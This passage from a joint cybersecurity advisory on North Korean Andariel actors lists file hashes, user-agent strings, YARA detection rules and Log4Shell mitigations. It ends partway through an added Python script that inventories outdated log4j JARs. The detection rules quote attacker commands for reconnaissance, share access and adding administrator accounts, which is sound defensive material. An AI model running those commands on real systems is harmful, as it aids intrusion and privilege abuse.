9767aa592ec2d6ae3c7d40b6049d0466
b22fd0604c4f189f2b7a59c8f48882dd
e53ca714787a86c13f07942a56d64efa
c7b09f1dd0a5694de677f3ecceda41b7
c8346b39418f92725719f364068a218d
730bff14e80ffd7737a97cdf11362ab5
9a481bc83fea1dea3e3bdfff5e154d44
ddb1f970371fa32faae61fc5b8423d4b
6c2b947921e7c77d9af62ce9a3ed7621
977d30b261f64cc582b48960909d0a89
7ce51b56a6b0f8f78056ddfc5b5de67c
dd9625be4a1201c6dfb205c12cf3a381
ecb4a09618e2aba77ea37bd011d7d7f7
0fd8c6f56c52c21c061a94e5765b27b4
c90d094a8fbeaa8a0083c7372bfc1897
0055a266aa536b2fdadb3336ef8d4fba
55bb271bbbf19108fec73d224c9b4218
0c046a2f5304ed8d768795a49b99d6e4
f34664e0d9a10974da117c1ca859dba8
a2c2099d503fcc29478205f5aef0283b
e439f850aa8ead560c99a8d93e472225
7c30ed6a612a1fd252565300c03c7523
81738405a7783c09906da5c7212e606b
c027d641c4c1e9d9ad048cda2af85db6
eb7ba9f7424dffdb7d695b00007a3c6d
3e9ee5982e3054dc76d3ba5cc88ae3de
073e3170a8e7537ff985ec8316319351
9b0e7c460a80f740d455a7521f0eada1
2d02f5499d35a8dffb4c8bc0b7fec5c2
0984954526232f7d05910aa5b07c5893
4156a7283284ece739e1bae05f99e17c
3026d419ee140f3c6acd5bff54132795
7aa132c0cc63a38fb4d1789553266fc7
1a0811472fad0ff507a92c957542fffd
f8aef59d0c5afe8df31e11a1984fbc0a
82491b42b9a2d34b13137e36784a67d7
0a199944f757d5615164e8808a3c712a
9c97ea18da290a6833a1d36e2d419efc
16f768eac33f79775a9672018e0d64f5

The following are observed SHA-256 hashes:

ed8ec7a8dd089019cfd29143f008fa0951c56a35d73b2e1b274315152d0c0ee6
db6a9934570fa98a93a979e7e0e218e0c9710e5a787b18c6948f2eedd9338984
773760fd71d52457ba53a314f15dddb1a74e8b2f5a90e5e150dea48a21aa76df
05e9fe8e9e693cb073ba82096c291145c953ca3a3f8b3974f9c66d15c1a3a11d
e3027062e602c5d1812c039739e2f93fc78341a67b77692567a4690935123abe
1962ebb7bf8d2b306c6f3b55c3dcd69a755eeff1a17577b7606894b781841c3a
f226086b5959eb96bd30dec0ffcbf0f09186cd11721507f416f1c39901addafb
6db57bbc2d07343dd6ceba0f53c73756af78f09fe1cb5ce8e8008e5e7242eae1
b7435d23769e79fcbe69b28df4aef062685d1a631892c2354f96d833eae467be
66415464a0795d0569efa5cb5664785f74ed0b92a593280d689f3a2ac68dca66
def2f01fbd4be85f48101e5ab7ddd82efb720e67daa6838f30fd8dcda1977563
323cbe7a3d050230cfaa822c2a22160b4f8c5fe65481dd329841ee2754b522d9
74529dd15d1953a47f0d7ecc2916b2b92865274a106e453a24943ca9ee434643
1e4de822695570421eb2f12fdfe1d32ab8639655e12180a7ab3cf429e7811b8f
8ce219552e235dcaf1c694be122d6339ed4ff8df70bf358cd165e6eb487ccfc5
c2904dc8bbb569536c742fca0c51a766e836d0da8fac1c1abd99744e9b50164f
dda53eee2c5cb0abdbf5242f5e82f4de83898b6a9dd8aa935c2be29bafc9a469
90fb0cd574155fd8667d20f97ac464eca67bdb6a8ee64184159362d45d79b6a4
452ca47230afd4bb85c45af54fcacbfa544208ef8b4604c3c5caefe3a64dcc19
199ba618efc6af9280c5abd86c09cdf2d475c09c8c7ffc393a35c3d70277aed1
2eb16dbc1097a590f07787ab285a013f5fe235287cb4fb948d4f9cce9efa5dbc
ce779e30502ecee991260fd342cc0d7d5f73d1a070395b4120b8d300ad11d694
db6a9934570fa98a93a979e7e0e218e0c9710e5a787b18c6948f2eedd9338984
c28bb61de4a6ad1c5e225ad9ec2eaf4a6c8ccfff40cf45a640499c0adb0d8740
34d5a5d8bec893519f204b573c33d54537b093c52df01b3d8c518af08ee94947
664f8d19af3400a325998b332343a9304f03bab9738ddab1530869eff13dae54
772b06f34facf6a2ce351b8679ff957cf601ef3ad29645935cb050b4184c8d51
aa29bf4292b68d197f4d8ca026b97ec7785796edcb644db625a8f8b66733ab54
9a5504dcfb7e664259bfa58c46cfd33e554225daf1cedea2ec2a9d83bbbfe238
c2500a6e12f22b16e221ba01952b69c92278cd05632283d8b84c55c916efe27c
8aa6612c95c7cef49709596da43a0f8354f14d8c08128c4cb9b1f37e548f083b
38f0f2d658e09c57fc78698482f2f638843eb53412d860fb3a99bb6f51025b07

The following is a list of user agent strings used by the actors:

Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0
Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0

Detection Methods

See Table 2 for YARA rules, created by
the FBI, authoring partners, and private industry, that can be used to detect malware used by the actors. Table 2. YARA Rules rule Andariel_ScheduledTask_Loader{    strings:        $obfuscation1 = { B8 02 00 00 00 48 6B C0 00 B9 CD FF 00 00 66 89 8C 04 60 01 00 00 B8 02 00 00 00 48 6B C0 01 B9 CC FF 00 00 66 89 8C 04 60 01 00 00 B8 02 00 00 00 48 6B C0 02 B9 8D FF 00 00 66 89 8C 04 60 01 00 00 B8 02 00 00 00 48 6B C0 03 B9 9A FF 00 00 66 89 8C 04 60 01 00 00 B8 02 00 00 00 48 6B C0 04 B9 8C FF 00 00 66 89 8C 04 60 01 00 00 B8 02 00 00 00 48 6B C0 05 B9 8A FF 00 00 66 89 8C 04 60 01 00 00 B8 02 00 00 00 48 6B C0 06 33 C9 66 89 8C 04 60 01 00 00 }                             $obfuscation2 = { 48 6B C0 02 C6 44 04 20 BA B8 01 00 00 00 48 6B C0 03 C6 44 04 20 9A B8 01 00 00 00 48 6B C0 04 C6 44 04 20 8B B8 01 00 00 00 48 6B C0 05 C6 44 04 20 8A B8 01 00 00 00 48 6B C0 06 C6 44 04 20 9C B8 01 00 00 00 }                             $obfuscation3 = { 48 6B C0 00 C6 44 04 20 A8 B8 01 00 00 00 48 6B C0 01 C6 44 04 20 9A B8 01 00 00 00 48 6B C0 02 C6 44 04 20 93 B8 01 00 00 00 48 6B C0 03 C6 44 04 20 96 B8 01 00 00 00 48 6B C0 04 C6 44 04 20 B9 B8 01 00 00 00 48 6B C0 05 C6 44 04 20 9A B8 01 00 00 00 48 6B C0 06 C6 44 04 20 8B B8 01 00 00 00 48 6B C0 07 C6 44 04 20 9E B8 01 00 00 00 48 6B C0 08 C6 44 04 20 9A B8 01 00 00 00 48 6B C0 09 C6 44 04 20 8D B8 01 00 00 00 48 6B C0 0A C6 44 04 20 BC B8 01 00 00 00 }    condition:        uint16(0) == 0x5A4D and $obfuscation1 and $obfuscation2 and $obfuscation3} rule Andariel_KaosRAT_Yamabot{    strings:        $str1 = “/kaos/”        $str2 = “Abstand [”        $str3 = “] anwenden”        $str4 = “cmVjYXB0Y2hh”        $str5 = “/bin/sh”        $str6 = “utilities.CIpaddress”        $str7 = “engine.NewEgg”        $str8 = “%s%04x%s%s%s”        $str9 = “Y2FwdGNoYV9zZXNzaW9u”        $str10 = “utilities.EierKochen”        $str11 = “kandidatKaufhaus”    condition:        3 of them} rule TriFaux_EasyRAT_JUPITER{    strings:        $InitOnce = 
“InitOnceExecuteOnce”        $BREAK = { 0D 00 0A 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 0D 00 0A }                             $Bytes = “4C,$00,$00,$00,$01,$14,$02,$00,$00,$00,$00,$00,$C0,$00,$00,$00,$00,$00,$00,” wide    condition:        uint16(0) == 0x5a4d and all of them} rule Andariel_CutieDrop_MagicRAT{              strings:                             $config_os_w = “os/windows” ascii wide                             $config_os_l = “os/linux” ascii wide                             $config_os_m = “os/mac” ascii wide                             $config_comp_msft = “company/microsoft” ascii wide                             $config_comp_orcl = “company/oracle” ascii wide                             $POST_field_1 = “session=” ascii wide                             $POST_field_2 = “type=” ascii wide                             $POST_field_3 = “id=” ascii wide                             $command_misspelled = “renmae” ascii wide              condition:                             uint16(0) == 0x5a4d and 7 of them rule Andariel_hhsd_FileTransferTool{    strings:        // 30 4D C7                xor     [rbp+buffer_v41+3], cl        // 81 7D C4 22 C0 78 00    cmp      dword ptr [rbp+buffer_v41], 78C022h        // 44 88 83 00 01 00 00    mov      [rbx+100h], r8b        $handshake = { 30 ?? ?? 81 7? ?? 22 C0 78 00 4? 
88 }                // B1 14                   mov     cl, 14h        // C7 45 F7 14 00 41 00    mov      [rbp+57h+Src], 410014h        // C7 45 FB 7A 00 7F 00    mov      [rbp+57h+var_5C], 7F007Ah        // C7 45 FF 7B 00 63 00    mov     [rbp+57h+var_58], 63007Bh        // C7 45 03 7A 00 34 00    mov      [rbp+57h+var_54], 34007Ah        // C7 45 07 51 00 66 00    mov      [rbp+57h+var_50], 660051h        // C7 45 0B 66 00 7B 00    mov      [rbp+57h+var_4C], 7B0066h        // C7 45 0F 66 00 00 00    mov      [rbp+57h+var_48], 66h ; ‘f’        $err_xor_str = { 14 C7 [2] 14 00 41 00 C7 [2] 7A 00 7F 00 C7 [2] 7B 00 63 00 C7 [2] 7A 00 34 00 }                // 41 02 D0                add     dl, r8b        // 44 02 DA                add     r11b, dl        // 3C 1F                   cmp     al, 1Fh        $buf_add_cmp_1f = { 4? 02 ?? 4? 02 ?? 3? 1F }         // B9 8D 10 B7 F8          mov     ecx, 0F8B7108Dh        // E8 F1 BA FF FF          call    sub_140001280        $hash_call_loadlib = { B? 8D 10 B7 F8 E8 }        $hash_call_unk = { B? 
91 B8 F6 88 E8 }            condition:        uint16(0) == 0x5a4d and        (any of ($handshake, $err_xor_str, $buf_add_cmp_1f) and any of ($hash_call_*)) or        2 of ($handshake, $err_xor_str, $buf_add_cmp_1f) rule Andariel_Atharvan_3RAT{strings:$3RAT = “D:\\rang\\TOOL\\3RAT” $atharvan = “Atharvan_dll.pdb”condition:uint16(0) == 0x5a4d and any of them} rule Andariel_LilithRAT_Variant{    strings:        // The following are strings seen in the open source version of Lilith        $lilith_1 = “Initiate a CMD session first.” ascii wide        $lilith_2 = “CMD is not open” ascii wide        $lilith_3 = “Couldn’t write command” ascii wide        $lilith_4 = “Couldn’t write to CMD: CMD not open” ascii wide        // The following are strings that appear to be unique to the Unnamed Trojan based on Lilith        $unique_1 = “Upload Error!” ascii wide        $unique_2 = “ERROR: Downloading is already running!” ascii wide        $unique_3 = “ERROR: Unable to open file:” ascii wide        $unique_4 = “General error” ascii wide        $unique_5 = “CMD error” ascii wide        $unique_6 = “killing self” ascii wide    condition:        uint16(0) == 0x5a4d and filesize < 150KB and all of ($lilith_*) and 2 of ($unique_*)} rule Andariel_SocksTroy_Strings_OpCodes{       strings:        $strHost = “-host” wide        $strAuth = “-auth” wide        $SocksTroy = “SocksTroy”         $cOpCodeCheck = { 81 E? A0 00 00 00 0F 84 ?? ?? ?? ?? 83 E? 03 74 ?? 83 E? 02 74 ?? 83 F? 0B }    condition:        uint16(0) == 0x5a4d and        ((1 of ($str*)) and         (all of ($c*)) or (all of ($Socks*)))} rule Andariel_Agni{    strings:        $xor = { 34 ?? 88 01 48 8D 49 01 0F B6 01 84 C0 75 F1 }        $stackstrings = {C7 44 24 [5-10] C7 44 24 [5] C7 44 24 [5-10] C7 44 24 [5-10] C7 44 24}    condition:        uint16(0) == 0x5a4d and (#xor > 100 and #stackstrings > 5)} rule Andariel_GoLang_validalpha_handshake{    strings:        $ = { 66 C7 00 AB CD C6 40 02 EF ?? 03 00 00 00 48 89 C1 ?? 
03 00 00 00 }    condition:        all of them} rule Andariel_GoLang_validalpha_tasks{    strings:        $ = “main.ScreenMonitThread”        $ = “main.CmdShell”        $ = “main.GetAllFoldersAndFiles”        $ = “main.SelfDelete”    condition:        all of them} rule Andariel_GoLang_validalpha_BlackString{    strings:    $ = “I:/01___Tools/02__RAT/Black”    condition:    uint16(0) == 0x5A4D and all of them} rule INDICATOR_EXE_Packed_VMProtect {        strings:        $s1 = “.vmp0” fullword ascii        $s2 = “.vmp1” fullword ascii    condition:        uint16(0) == 0x5a4d and all of them or        for any i in (0 .. pe.number_of_sections) : (            (                pe.sections[i].name == “.vmp0” or                pe.sections[i].name == “.vmp1”            )        )} rule INDICATOR_EXE_Packed_Themida {        strings:        $s1 = “.themida” fullword ascii    condition:        uint16(0) == 0x5a4d and all of them or        for any i in (0 .. pe.number_of_sections) : (            (                pe.sections[i].name == “.themida”            )        )} rule Andariel_elf_backdoor_fipps{strings:        $a = “found mac address”        $b = “RecvThread”        $c = “OpenSSL-1.0.0-fipps”        $d = “Disconnected!”    condition:        (all of them) and uint32(0) == 0x464c457f} rule Andariel_bindshell{strings: $str_comspec = “COMSPEC” $str_consolewindow = “GetConsoleWindow” $str_ShowWindow = “ShowWindow” $str_WSASocketA = “WSASocketA” $str_CreateProcessA = “CreateProcessA” $str_port = {B9 4D 05 00 00 89}condition:uint16(0) == 0x5A4D and all of them} rule Andariel_grease2{strings: $str_rdpconf = “c: \\windows\\temp\\RDPConf.exe” fullword nocase $str_rdpwinst = “c: \\windows\\temp\\RDPWInst.exe” fullword nocase $str_net_user = “net user” $str_admins_add = “net localgroup administrators”condition:uint16(0) == 0x5A4D andall of them} rule Andariel_NoPineapple_Dtrack_unpacked{strings: $str_nopineapple = “< No Pineapple! 
>” $str_qt_library = “Qt 5.12.10” $str_xor = {8B 10 83 F6 ?? 83 FA 01 77}condition:uint16(0) == 0x5A4D andall of them} rule Andariel_dtrack_unpacked{strings: $str_mutex = “MTX_Global” $str_cmd_1 = “/c net use \\\\” wide $str_cmd_2 = “/c ping -n 3 127.0.01 > NUL % echo EEE > \”%s\”” wide $str_cmd_3 = “/c move /y %s \\\\” wide $str_cmd_4 = “/c systeminfo > \”%s\” & tasklist > \”%s\” & netstat -naop tcp > \”%s\”” widecondition:uint16(0) == 0x5A4D andall of them} rule Andariel_TigerRAT_crowdsourced_rule {    strings:        $m1 = “.?AVModuleKeyLogger@@” fullword ascii        $m2 = “.?AVModulePortForwarder@@” fullword ascii        $m3 = “.?AVModuleScreenCapture@@” fullword ascii        $m4 = “.?AVModuleShell@@” fullword ascii        $s1 = “\\x9891-009942-xnopcopie.dat” fullword wide        $s2 = “(%02d : %02d-%02d %02d:%02d:%02d)— %s[Clipboard]” fullword ascii        $s3 = “[%02d : %02d-%02d %02d:%02d:%02d]— %s[Title]” fullword ascii        $s4 = “del \”%s\”%s \”%s\” goto ” ascii        $s5 = “[<<]” fullword ascii    condition:        uint16(0) == 0x5a4d and (all of ($s*) or (all of ($m*) and 1 of ($s*)) or (2 of ($m*) and 2 of ($s*)))} rule win_tiger_rat_auto {    strings:        $sequence_0 = { 33c0 89442438 89442430 448bcf 4533c0 }            // n = 5, score = 200            //   33c0                 | jmp                 5            //   89442438             | dec                 eax            //   89442430             | mov                 eax, ecx            //   448bcf               | movzx               eax, byte ptr [eax]            //   4533c0               | dec                 eax        $sequence_1 = { 41b901000000 488bd6 488bcb e8???????? }            // n = 4, score = 200            //   41b901000000         | dec                 eax            //   488bd6                | mov                 eax, dword ptr [ecx]            //   488bcb               | jmp                 8            //   e8????????           
|                             $sequence_2 = { 4881ec90050000 8b01 8985c8040000 8b4104 }            // n = 4, score = 200            //   4881ec90050000       | test                eax, eax            //   8b01                 | jns                 0x16            //   8985c8040000         | dec                 eax            //   8b4104               | mov                 eax, dword ptr [ecx]        $sequence_3 = { 488b01 ff10 488b4f08 4c8d4c2430 }            // n = 4, score = 200            //   488b01               | mov                 edx, esi            //   ff10                 | dec                 eax            //   488b4f08             | mov                 ecx, ebx            //   4c8d4c2430           | inc                 ecx        $sequence_4 = { 488b01 ff10 488b4e18 488b01 }            // n = 4, score = 200            //   488b01               | dec                 eax            //   ff10                 | cmp                 dword ptr [ecx + 0x18], 0x10            //   488b4e18             | dec                 eax            //   488b01               | sub                 esp, 0x590        $sequence_5 = { 4881eca0000000 33c0 488bd9 488d4c2432 }            // n = 4, score = 200            //   4881eca0000000       | mov                 eax, dword ptr [ecx]            //   33c0                 | mov                 dword ptr [ebp + 0x4c8], eax            //   488bd9               | mov                 eax, dword ptr [ecx + 4]            //   488d4c2432           | mov                 dword ptr [ebp + 0x4d0], eax        $sequence_6 = { 488b01 eb03 488bc1 0fb600 }            // n = 4, score = 200            //   488b01               | inc                 ecx            //   eb03                 | mov                 ebx, dword ptr [ebp + ebp]            //   488bc1               | inc                 ecx            //   0fb600               | movups              xmmword ptr [edi], xmm0        $sequence_7 = { 488b01 8b10 895124 448b4124 4585c0 }        
    // n = 5, score = 200            //   488b01               | sub                 esp, 0x30            //   8b10                 | dec                 ecx            //   895124               | mov                 ebx, eax            //   448b4124             | dec                 eax            //   4585c0               | mov                 ecx, eax        $sequence_8 = { 4c8d0d31eb0000 c1e918 c1e808 41bf00000080 }            // n = 4, score = 100            //   4c8d0d31eb0000       | jne                 0x1e6            //   c1e918               | dec                 eax            //   c1e808               | lea                 ecx, [0xbda0]            //   41bf00000080         | dec                 esp        $sequence_9 = { 488bd8 4885c0 752d ff15???????? 83f857 0f85e0010000 488d0da0bd0000 }            // n = 7, score = 100            //   488bd8               | dec                 eax            //   4885c0               | mov                 ebx, eax            //   752d                 | dec                 eax            //   ff15????????         |                                 //   83f857               | test                eax, eax            //   0f85e0010000         | jne                 0x2f            //   488d0da0bd0000       | cmp                  eax, 0x57        $sequence_10 = { 75d4 488d1d7f6c0100 488b4bf8 4885c9 740b }            // n = 5, score = 100            //   75d4                 | lea                 ecx, [0xeb31]            //   488d1d7f6c0100       | shr                 ecx, 0x18            //   488b4bf8             | shr                 eax, 8            //   4885c9               | inc                 ecx            //   740b                 | mov                 edi, 0x80000000        $sequence_11 = { 0f85d9000000 488d15d0c90000 41b810200100 488bcd e8???????? 
eb6b b9f4ffffff }            // n = 7, score = 100            //   0f85d9000000         | jne                 0xffffffd6            //   488d15d0c90000       | dec                 eax            //   41b810200100         | lea                 ebx, [0x16c7f]            //   488bcd               | dec                 eax            //   e8????????           |                                 //   eb6b                 | mov                 ecx, dword ptr [ebx – 8]            //   b9f4ffffff           | dec                 eax        $sequence_12 = { 48890d???????? 488905???????? 488d05ae610000 488905???????? 488d05a0550000 488905???????? }            // n = 6, score = 100            //    48890d????????       |                                 //   488905????????       |                                 //   488d05ae610000       | test                ecx, ecx            //   488905????????       |                                 //   488d05a0550000       | je                  0x10            //   488905????????       |                             $sequence_13 = { 8bcf e8???????? 488b7c2448 85c0 0f8440030000 488d0560250100 }            // n = 6, score = 100            //   8bcf                  | mov                 eax, 0x12010            //   e8????????           |                                 //   488b7c2448           | dec                 eax            //   85c0                 | mov                 ecx, ebp            //   0f8440030000         | jmp                 0x83            //   488d0560250100       | mov                 ecx, 0xfffffff4        $sequence_14 = { ff15???????? 8b05???????? 2305???????? ba02000000 33c9 8905???????? 8b05???????? }            // n = 7, score = 100            //   ff15????????         |                                 //   8b05????????         |                                 //   2305????????         
|                                 //   ba02000000           | dec                 eax            //   33c9                 | lea                 eax, [0x61ae]            //   8905????????         |                                 //   8b05????????         |                             $sequence_15 = { 4883ec30 498bd8 e8???????? 488bc8 4885c0 }            // n = 5, score = 100            //   4883ec30             | jne                 0xdf            //   498bd8               | dec                 eax            //   e8????????           |                                 //   488bc8               | lea                 edx, [0xc9d0]            //   4885c0               | inc                 ecx    condition:        7 of them and filesize < 557056} rule win_dtrack_auto {    strings:        $sequence_0 = { 52 8b4508 50 e8???????? 83c414 8b4d10 51 }            // n = 7, score = 400            //   52                   | push                edx            //   8b4508               | mov                 eax, dword ptr [ebp + 8]            //   50                   | push                eax            //   e8????????           
|                                 //   83c414               | add                 esp, 0x14            //   8b4d10               | mov                 ecx, dword ptr [ebp + 0x10]            //   51                   | push                ecx        $sequence_1 = { 3a4101 7523 83854cf6ffff02 838550f6ffff02 80bd4af6ffff00 75ae c78544f6ffff00000000 }            // n = 7, score = 300            //   3a4101               | cmp                 al, byte ptr [ecx + 1]            //    7523                 | jne                 0x25            //   83854cf6ffff02       | add                 dword ptr [ebp – 0x9b4], 2            //   838550f6ffff02       | add                 dword ptr [ebp – 0x9b0], 2            //   80bd4af6ffff00       | cmp                 byte ptr [ebp – 0x9b6], 0            //   75ae                 | jne                 0xffffffb0            //   c78544f6ffff00000000     | mov     dword ptr [ebp – 0x9bc], 0        $sequence_2 = { 50 ff15???????? a3???????? 68???????? e8???????? 83c404 50 }            // n = 7, score = 300            //   50                   | push                eax            //   ff15????????         |                                 //   a3????????           |                                 //   68????????           |                                 //   e8????????           |                                 //   83c404               | add                 esp, 4            //   50                   | push                eax        $sequence_3 = { 8d8dd4faffff 51 e8???????? 83c408 8b15???????? }            // n = 5, score = 300            //   8d8dd4faffff         | lea                 ecx, [ebp – 0x52c]            //   51                   | push                ecx            //   e8????????           |                                 //   83c408               | add                 esp, 8            //   8b15????????         |                             $sequence_4 = { 8855f5 6a5c 8b450c 50 e8???????? 
}            // n = 5, score = 300            //   8855f5               | mov                 byte ptr [ebp – 0xb], dl            //   6a5c                 | push                0x5c            //   8b450c               | mov                 eax, dword ptr [ebp + 0xc]            //   50                   | push                eax            //   e8????????           |                             $sequence_5 = { 51 e8???????? 83c410 8b558c 52 }            // n = 5, score = 300            //   51                   | push                ecx            //   e8????????           |                                 //   83c410               | add                 esp, 0x10            //   8b558c                | mov                 edx, dword ptr [ebp – 0x74]            //   52                   | push                edx        $sequence_6 = { 8b4d0c 51 68???????? 8d9560eaffff 52 e8???????? }            // n = 6, score = 300            //   8b4d0c               | mov                 ecx, dword ptr [ebp + 0xc]            //   51                   | push                ecx            //   68????????           |                                 //   8d9560eaffff         | lea                 edx, [ebp – 0x15a0]            //   52                   | push                edx            //   e8????????           
        $sequence_7 = { 83c001 8945f4 837df420 7d2c 8b4df8 }
            // n = 5, score = 300
            //   83c001               | add                 eax, 1
            //   8945f4               | mov                 dword ptr [ebp - 0xc], eax
            //   837df420             | cmp                 dword ptr [ebp - 0xc], 0x20
            //   7d2c                 | jge                 0x2e
            //   8b4df8               | mov                 ecx, dword ptr [ebp - 8]
        $sequence_8 = { 83c001 89856cf6ffff 8b8d70f6ffff 8a11 }
            // n = 4, score = 300
            //   83c001               | add                 eax, 1
            //   89856cf6ffff         | mov                 dword ptr [ebp - 0x994], eax
            //   8b8d70f6ffff         | mov                 ecx, dword ptr [ebp - 0x990]
            //   8a11                 | mov                 dl, byte ptr [ecx]
        $sequence_9 = { 0355f0 0fb602 0fb64df7 33c1 0fb655fc 33c2 }
            // n = 6, score = 200
            //   0355f0               | add                 edx, dword ptr [ebp - 0x10]
            //   0fb602               | movzx               eax, byte ptr [edx]
            //   0fb64df7             | movzx               ecx, byte ptr [ebp - 9]
            //   33c1                 | xor                 eax, ecx
            //   0fb655fc             | movzx               edx, byte ptr [ebp - 4]
            //   33c2                 | xor                 eax, edx
        $sequence_10 = { d1e9 894df8 8b5518 8955fc c745f000000000 }
            // n = 5, score = 200
            //   d1e9                 | shr                 ecx, 1
            //   894df8               | mov                 dword ptr [ebp - 8], ecx
            //   8b5518               | mov                 edx, dword ptr [ebp + 0x18]
            //   8955fc               | mov                 dword ptr [ebp - 4], edx
            //   c745f000000000       | mov                 dword ptr [ebp - 0x10], 0
        $sequence_11 = { 8b4df0 3b4d10 0f8d90000000 8b5508 0355f0 0fb602 }
            // n = 6, score = 200
            //   8b4df0               | mov                 ecx, dword ptr [ebp - 0x10]
            //   3b4d10               | cmp                 ecx, dword ptr [ebp + 0x10]
            //   0f8d90000000         | jge                 0x96
            //   8b5508               | mov                 edx, dword ptr [ebp + 8]
            //   0355f0               | add                 edx, dword ptr [ebp - 0x10]
            //   0fb602               | movzx               eax, byte ptr [edx]
        $sequence_12 = { 894d14 8b45f8 c1e018 8b4dfc c1e908 0bc1 }
            // n = 6, score = 200
            //   894d14               | mov                 dword ptr [ebp + 0x14], ecx
            //   8b45f8               | mov                 eax, dword ptr [ebp - 8]
            //   c1e018               | shl                 eax, 0x18
            //   8b4dfc               | mov                 ecx, dword ptr [ebp - 4]
            //   c1e908               | shr                 ecx, 8
            //   0bc1                 | or                  eax, ecx
        $sequence_13 = { 0bc1 894518 8b5514 8955f8 }
            // n = 4, score = 200
            //   0bc1                 | or                  eax, ecx
            //   894518               | mov                 dword ptr [ebp + 0x18], eax
            //   8b5514               | mov                 edx, dword ptr [ebp + 0x14]
            //   8955f8               | mov                 dword ptr [ebp - 8], edx
        $sequence_14 = { 8b5514 8955f8 8b4518 8945fc e9???????? 8be5 }
            // n = 6, score = 200
            //   8b5514               | mov                 edx, dword ptr [ebp + 0x14]
            //   8955f8               | mov                 dword ptr [ebp - 8], edx
            //   8b4518               | mov                 eax, dword ptr [ebp + 0x18]
            //   8945fc               | mov                 dword ptr [ebp - 4], eax
            //   e9????????           |
            //   8be5                 | mov                 esp, ebp
    condition:
        7 of them and filesize < 1736704
    }

    Mitigation Measures
    The authoring agencies recommend implementing the mitigations below to improve your organization’s cybersecurity posture based on the threat actors’ activity.
    Log4Shell and Other Log4j Vulnerabilities
    Defenders should consult the joint Cybersecurity Advisory titled “Mitigating Log4Shell and Other Log4j-Related Vulnerabilities” and CISA’s “Apache Log4j Vulnerability” guidance. Organizations can mitigate the risks posed by the vulnerability by identifying assets affected by Log4Shell and other Log4j-related vulnerabilities and upgrading Log4j assets and affected products to the latest version.
    Note: CVE-2021-44228 ‘Log4Shell’ was disclosed in December 2021 and affects the Log4j library prior to version 2.17.0. Defenders should remain alert to vendor software updates, and initiate hunt and incident response procedures to detect possible Log4Shell exploitation.
    Web Shell Malware
    Web shell malware is deployed by adversaries on a victim’s web server to execute arbitrary system commands. The NSA and Australian Signals Directorate’s report titled “Detect and Prevent Web Shell Malware” provides mitigating actions to identify and recover from web shells.
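    The Log4Shell mitigation above starts with finding every Log4j asset. The following is an added example, not tooling from the advisory or its authoring agencies: a Python script that walks a directory tree, picks out log4j-core JARs, reads their version from the manifest (falling back to the file name), and reports those below the 2.17.0 threshold stated in the note above, together with whether JndiLookup.class is still present. It builds its own constructed sample JARs so it runs offline; the threshold, path layout and sample contents are assumptions of the example.

```python
"""Inventory helper for the Log4Shell mitigation: find log4j-core JARs below the
fixed version or still carrying JndiLookup.class. Added example, not CISA tooling."""
import os
import re
import tempfile
import zipfile

# Threshold taken from the advisory note above ("prior to version 2.17.0").
FIXED_VERSION = (2, 17, 0)
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
CORE_PREFIX = "org/apache/logging/log4j/core/"


def parse_version(text):
    """Turn '2.14.1' or '2.0-beta9' into a comparable 3-tuple of ints."""
    parts = []
    for piece in text.split(".")[:3]:
        digits = re.match(r"\d+", piece)
        parts.append(int(digits.group()) if digits else 0)
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts)


def inspect_jar(path):
    """Return a finding for a log4j-core JAR, or None if the JAR is something else."""
    with zipfile.ZipFile(path) as jar:
        names = jar.namelist()
        if not any(n.startswith(CORE_PREFIX) for n in names):
            return None
        version = None
        if "META-INF/MANIFEST.MF" in names:
            manifest = jar.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
            match = re.search(r"^Implementation-Version:\s*(\S+)", manifest, re.M)
            if match:
                version = match.group(1)
        if version is None:
            # Fallback: version embedded in a conventional file name.
            match = re.search(r"log4j-core-(\d[^/\\]*)\.jar$", os.path.basename(path))
            if match:
                version = match.group(1)
        below_fix = version is not None and parse_version(version) < FIXED_VERSION
        return {
            "path": path,
            "version": version,
            "jndi_lookup_present": JNDI_CLASS in names,
            # An unknown version is treated as needing review, never as safe.
            "needs_action": below_fix or version is None,
        }


def scan_tree(root):
    """Walk root and inspect every *.jar; unreadable archives are skipped."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not name.lower().endswith(".jar"):
                continue
            full = os.path.join(dirpath, name)
            try:
                finding = inspect_jar(full)
            except zipfile.BadZipFile:
                continue
            if finding:
                findings.append(finding)
    return findings


def _write_sample_jar(path, version):
    """Constructed sample JAR: a manifest plus empty class entries (no real code)."""
    with zipfile.ZipFile(path, "w") as jar:
        jar.writestr(
            "META-INF/MANIFEST.MF",
            "Manifest-Version: 1.0\r\n"
            "Implementation-Title: Apache Log4j Core\r\n"
            f"Implementation-Version: {version}\r\n",
        )
        jar.writestr(CORE_PREFIX + "Logger.class", b"")
        jar.writestr(JNDI_CLASS, b"")  # the class ships in old and new releases alike


def demo():
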